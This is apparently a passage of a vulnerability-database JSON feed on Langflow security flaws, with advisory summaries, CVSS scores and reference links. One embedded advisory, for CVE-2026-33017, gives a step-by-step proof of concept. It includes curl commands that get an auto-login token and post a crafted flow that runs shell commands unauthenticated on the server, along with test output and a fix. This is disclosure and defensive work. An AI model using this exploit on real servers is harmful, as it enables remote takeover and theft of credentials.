                    "reference_url": "https://github.com/advisories/GHSA-9jpj-cph8-w449",
                    "reference_id": "GHSA-9jpj-cph8-w449",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-9jpj-cph8-w449"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109912?format=api",
                    "purl": "pkg:pypi/langflow@1.9.1",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.1"
                }
            ],
            "aliases": [
                "CVE-2026-6598",
                "GHSA-9jpj-cph8-w449"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ypxh-x2hy-3uhb"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37154?format=api",
            "vulnerability_id": "VCID-ysnc-jyxb-6qcy",
            "summary": "Langflow versions up to and including 1.6.9 contain a chained vulnerability that enables account takeover and remote code execution. An overly permissive CORS configuration (allow_origins='*' with allow_credentials=True) combined with a refresh token cookie configured as SameSite=None allows a malicious webpage to perform cross-origin requests that include credentials and successfully call the refresh endpoint. An attacker-controlled origin can therefore obtain fresh access_token / refresh_token pairs for a victim session. Obtained tokens permit access to authenticated endpoints — including built-in code-execution functionality — allowing the attacker to execute arbitrary code and achieve full system compromise.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-34291",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.32746",
                            "scoring_system": "epss",
                            "scoring_elements": "0.96973",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-34291"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Attend",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2026-05-21T19:39:27Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/pull/10139",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/pull/10139"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/pull/10696",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/pull/10696"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/pull/9240",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/pull/9240"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/pull/9441",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/pull/9441"
                },
                {
                    "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2025-78.yaml",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2025-78.yaml"
                },
                {
                    "reference_url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-34291",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-34291"
                },
                {
                    "reference_url": "https://www.obsidiansecurity.com/blog/cve-2025-34291-critical-account-takeover-and-rce-vulnerability-in-the-langflow-ai-agent-workflow-platform",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Attend",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2026-05-21T19:39:27Z/"
                        }
                    ],
                    "url": "https://www.obsidiansecurity.com/blog/cve-2025-34291-critical-account-takeover-and-rce-vulnerability-in-the-langflow-ai-agent-workflow-platform"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/langflow-cors-misconfiguration-to-token-hijack-and-rce",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Attend",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2026-05-21T19:39:27Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/langflow-cors-misconfiguration-to-token-hijack-and-rce"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34291",
                    "reference_id": "CVE-2025-34291",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34291"
                },
                {
                    "reference_url": "https://www.crowdsec.net/vulntracking-report/cve-2025-34291",
                    "reference_id": "CVE-2025-34291",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.crowdsec.net/vulntracking-report/cve-2025-34291"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-577h-p2hh-v4mv",
                    "reference_id": "GHSA-577h-p2hh-v4mv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-577h-p2hh-v4mv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/46626?format=api",
                    "purl": "pkg:pypi/langflow@1.7.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ynd-c2hz-53hx"
                        },
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-2649-thqq-r3d2"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-bb6r-1f6u-t7ed"
                        },
                        {
                            "vulnerability": "VCID-ncvf-vzqr-uydz"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-qwtw-q92t-quhz"
                        },
                        {
                            "vulnerability": "VCID-rc54-gw71-gyau"
                        },
                        {
                            "vulnerability": "VCID-rrva-95s5-kbcf"
                        },
                        {
                            "vulnerability": "VCID-sbea-kkfu-akgb"
                        },
                        {
                            "vulnerability": "VCID-u8mw-7znw-rfab"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        },
                        {
                            "vulnerability": "VCID-zqwj-45w7-7kft"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.0"
                }
            ],
            "aliases": [
                "CVE-2025-34291",
                "GHSA-577h-p2hh-v4mv",
                "PYSEC-2025-78"
            ],
            "risk_score": 10.0,
            "exploitability": "2.0",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ysnc-jyxb-6qcy"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91844?format=api",
            "vulnerability_id": "VCID-zqwj-45w7-7kft",
            "summary": "Unauthenticated Remote Code Execution in Langflow via Public Flow Build Endpoint\n## Summary\n\nThe `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint allows building public flows without requiring authentication. When the optional `data` parameter is supplied, the endpoint uses **attacker-controlled flow data** (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to `exec()` with zero sandboxing, resulting in unauthenticated remote code execution.\n\nThis is distinct from CVE-2025-3248, which fixed `/api/v1/validate/code` by adding authentication. The `build_public_tmp` endpoint is **designed** to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code.\n\n## Affected Code\n\n### Vulnerable Endpoint (No Authentication)\n\n**File:** `src/backend/base/langflow/api/v1/chat.py`, lines 580-657\n\n```python\n@router.post(\"/build_public_tmp/{flow_id}/flow\")\nasync def build_public_tmp(\n    *,\n    flow_id: uuid.UUID,\n    data: Annotated[FlowDataRequest | None, Body(embed=True)] = None,  # ATTACKER CONTROLLED\n    request: Request,\n    # ... NO Depends(get_current_active_user) -- MISSING AUTH ...\n):\n    \"\"\"Build a public flow without requiring authentication.\"\"\"\n    client_id = request.cookies.get(\"client_id\")\n    owner_user, new_flow_id = await verify_public_flow_and_get_user(flow_id=flow_id, client_id=client_id)\n\n    job_id = await start_flow_build(\n        flow_id=new_flow_id,\n        data=data,  # Attacker's data passed directly to graph builder\n        current_user=owner_user,\n        ...\n    )\n```\n\nCompare with the authenticated build endpoint at line 138, which requires `current_user: CurrentActiveUser`.\n\n### Code Execution Chain\n\nWhen attacker-supplied `data` is provided, it flows through:\n\n1. 
`start_flow_build(data=attacker_data)` → `generate_flow_events()` -- `build.py:81`\n2. `create_graph()` → `build_graph_from_data(payload=data.model_dump())` -- `build.py:298`\n3. `Graph.from_payload(payload)` parses attacker nodes -- `base.py:1168`\n4. `add_nodes_and_edges()` → `initialize()` → `_build_graph()` -- `base.py:270,527`\n5. `_instantiate_components_in_vertices()` iterates nodes -- `base.py:1323`\n6. `vertex.instantiate_component()` → `instantiate_class(vertex)` -- `loading.py:28`\n7. `code = custom_params.pop(\"code\")` extracts attacker code -- `loading.py:43`\n8. `eval_custom_component_code(code)` → `create_class(code, class_name)` -- `eval.py:9`\n9. `prepare_global_scope(module)` -- `validate.py:323`\n10. `exec(compiled_code, exec_globals)` -- **ARBITRARY CODE EXECUTION** -- `validate.py:397`\n\n### Unsandboxed exec() in prepare_global_scope\n\n**File:** `src/lfx/src/lfx/custom/validate.py`, lines 340-397\n\n```python\ndef prepare_global_scope(module):\n    exec_globals = globals().copy()\n\n    # Imports are resolved first (any module can be imported)\n    for node in imports:\n        module_obj = importlib.import_module(module_name)  # line 352\n        exec_globals[variable_name] = module_obj\n\n    # Then ALL top-level definitions are executed (Assign, ClassDef, FunctionDef)\n    if definitions:\n        combined_module = ast.Module(body=definitions, type_ignores=[])\n        compiled_code = compile(combined_module, \"<string>\", \"exec\")\n        exec(compiled_code, exec_globals)  # line 397 - ARBITRARY CODE EXECUTION\n```\n\n**Critical detail:** `prepare_global_scope` executes `ast.Assign` nodes. An attacker's code like `_x = os.system(\"id\")` is an assignment and will be executed during graph building -- before the flow even \"runs.\"\n\n## Prerequisites\n\n1. Target Langflow instance has at least **one public flow** (common for demos, chatbots, shared workflows)\n2. 
Attacker knows the public flow's UUID (discoverable via shared links/URLs)\n3. No authentication required -- only a `client_id` cookie (any arbitrary string value)\n\nWhen `AUTO_LOGIN=true` (the **default**), all prerequisites can be met by an unauthenticated attacker:\n1. `GET /api/v1/auto_login` → obtain superuser token\n2. `POST /api/v1/flows/` → create a public flow\n3. Exploit via `build_public_tmp` without any auth\n\n## Proof of Concept\n\n### Tested Against\n\n- **Langflow version 1.7.3** (latest stable release, installed via `pip install langflow`)\n- **Fully reproducible**: 6/6 runs confirmed RCE (two sets of 3 runs each)\n\n### Step 1: Obtain a Public Flow ID\n\n(In a real attack, the attacker discovers this via shared links. For the PoC, we create one via AUTO_LOGIN.)\n\n```bash\n# Get superuser token (no credentials needed when AUTO_LOGIN=true)\nTOKEN=$(curl -s http://localhost:7860/api/v1/auto_login | jq -r '.access_token')\n\n# Create a public flow\nFLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"name\":\"test\",\"data\":{\"nodes\":[],\"edges\":[]},\"access_type\":\"PUBLIC\"}' \\\n  | jq -r '.id')\n\necho \"Public Flow ID: $FLOW_ID\"\n```\n\n### Step 2: Exploit -- Unauthenticated RCE\n\n```bash\n# EXPLOIT: Send malicious flow data to the UNAUTHENTICATED endpoint\n# NO Authorization header, NO API key, NO credentials\ncurl -X POST \"http://localhost:7860/api/v1/build_public_tmp/${FLOW_ID}/flow\" \\\n  -H \"Content-Type: application/json\" \\\n  -b \"client_id=attacker\" \\\n  -d '{\n    \"data\": {\n      \"nodes\": [{\n        \"id\": \"Exploit-001\",\n        \"type\": \"genericNode\",\n        \"position\": {\"x\":0,\"y\":0},\n        \"data\": {\n          \"id\": \"Exploit-001\",\n          \"type\": \"ExploitComp\",\n          \"node\": {\n            \"template\": {\n              \"code\": {\n                \"type\": \"code\",\n    
            \"required\": true,\n                \"show\": true,\n                \"multiline\": true,\n                \"value\": \"import os, socket, json as _json\\n\\n_proof = os.popen(\\\"id\\\").read().strip()\\n_host = socket.gethostname()\\n_write = open(\\\"/tmp/rce-proof\\\",\\\"w\\\").write(f\\\"{_proof} on {_host}\\\")\\n\\nfrom lfx.custom.custom_component.component import Component\\nfrom lfx.io import Output\\nfrom lfx.schema.data import Data\\n\\nclass ExploitComp(Component):\\n    display_name=\\\"X\\\"\\n    outputs=[Output(display_name=\\\"O\\\",name=\\\"o\\\",method=\\\"r\\\")]\\n    def r(self)->Data:\\n        return Data(data={})\",\n                \"name\": \"code\",\n                \"password\": false,\n                \"advanced\": false,\n                \"dynamic\": false\n              },\n              \"_type\": \"Component\"\n            },\n            \"description\": \"X\",\n            \"base_classes\": [\"Data\"],\n            \"display_name\": \"ExploitComp\",\n            \"name\": \"ExploitComp\",\n            \"frozen\": false,\n            \"outputs\": [{\"types\":[\"Data\"],\"selected\":\"Data\",\"name\":\"o\",\"display_name\":\"O\",\"method\":\"r\",\"value\":\"__UNDEFINED__\",\"cache\":true,\"allows_loop\":false,\"tool_mode\":false,\"hidden\":null,\"required_inputs\":null,\"group_outputs\":false}],\n            \"field_order\": [\"code\"],\n            \"beta\": false,\n            \"edited\": false\n          }\n        }\n      }],\n      \"edges\": []\n    },\n    \"inputs\": null\n  }'\n```\n\n### Step 3: Verify Code Execution\n\n```bash\n# Wait 2 seconds for async graph building\nsleep 2\n\n# Check proof file written by attacker's code on the server\ncat /tmp/rce-proof\n# Output: uid=1000(aviral) gid=1000(aviral) groups=... 
on kali\n```\n\n### Actual Test Results\n\n```\n======================================================================\nLANGFLOW v1.7.3 UNAUTHENTICATED RCE - DEFINITIVE E2E TEST\n======================================================================\nVersion:  Langflow 1.7.3\n\nRUN 1: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)\n  HTTP 200 - Job ID: d8db19bf-a532-4f9d-a368-9c46d6235c19\n  *** REMOTE CODE EXECUTION CONFIRMED ***\n    canary: RCE-f0d19b36\n    hostname: kali\n    uid: 1000\n    whoami: aviral\n    id: uid=1000(aviral) gid=1000(aviral) groups=1000(aviral),...\n    uname: Linux 6.16.8+kali-amd64\n\nRUN 2: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)\n  HTTP 200 - Job ID: d2e24f20-d707-4278-868c-583dd7532832\n  *** REMOTE CODE EXECUTION CONFIRMED ***\n    canary: RCE-6037a271\n\nRUN 3: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)\n  HTTP 200 - Job ID: 5962244a-42af-4ef6-b134-a6a4adba5ab7\n  *** REMOTE CODE EXECUTION CONFIRMED ***\n    canary: RCE-4a796556\n\nFINAL RESULTS\n  Total checks:   15\n  VULNERABLE:     15\n  SAFE:           0\n  RCE confirmed:  3/3 runs\n  Reproducible:   YES (100%)\n```\n\n## Impact\n\n- **Unauthenticated Remote Code Execution** with full server process privileges\n- **Complete server compromise**: arbitrary file read/write, command execution\n- **Environment variable exfiltration**: API keys, database credentials, cloud tokens (confirmed in PoC: env_keys exfiltrated)\n- **Reverse shell access** for persistent access\n- **Lateral movement** within the network\n- **Data exfiltration** from all flows, messages, and stored credentials in the database\n\n## Comparison with CVE-2025-3248\n\n| Aspect | CVE-2025-3248 | This Vulnerability |\n|--------|--------------|-------------------|\n| **Endpoint** | `/api/v1/validate/code` | `/api/v1/build_public_tmp/{id}/flow` |\n| **Fix applied** | Added `Depends(get_current_active_user)` | None -- NEW vulnerability |\n| **Root cause** | Missing auth on code validation | 
Unauthenticated endpoint accepts attacker-controlled executable code via `data` param |\n| **Code execution via** | `validate_code()` → `exec()` | `create_class()` → `prepare_global_scope()` → `exec()` |\n| **CISA KEV** | Yes (actively exploited) | N/A (new finding) |\n| **Can simple auth fix?** | Yes (and it was fixed) | No -- endpoint is *designed* to be unauthenticated; the `data` parameter must be removed |\n\n## Recommended Fix\n\n### Immediate (Short-term)\n\n**Remove the `data` parameter** from `build_public_tmp`. Public flows should only execute their stored flow data, never attacker-supplied data:\n\n```python\n@router.post(\"/build_public_tmp/{flow_id}/flow\")\nasync def build_public_tmp(\n    *,\n    flow_id: uuid.UUID,\n    inputs: Annotated[InputValueRequest | None, Body(embed=True)] = None,\n    # REMOVED: data parameter -- public flows must use stored data only\n    ...\n):\n```\n\nIn `generate_flow_events` → `create_graph()`, only the `build_graph_from_db` path should be reachable for unauthenticated requests:\n\n```python\nasync def create_graph(fresh_session, flow_id_str, flow_name):\n    # For public flows, ALWAYS load from database, never from user data\n    return await build_graph_from_db(\n        flow_id=flow_id,\n        session=fresh_session,\n        ...\n    )\n```",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33017",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.24652",
                            "scoring_system": "epss",
                            "scoring_elements": "0.96242",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33017"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Act",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-26T03:55:25Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/issues/12345",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/issues/12345"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/pull/12160",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/pull/12160"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/releases/tag/1.8.2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/releases/tag/1.8.2"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Act",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-26T03:55:25Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx"
                },
                {
                    "reference_url": "https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33017",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
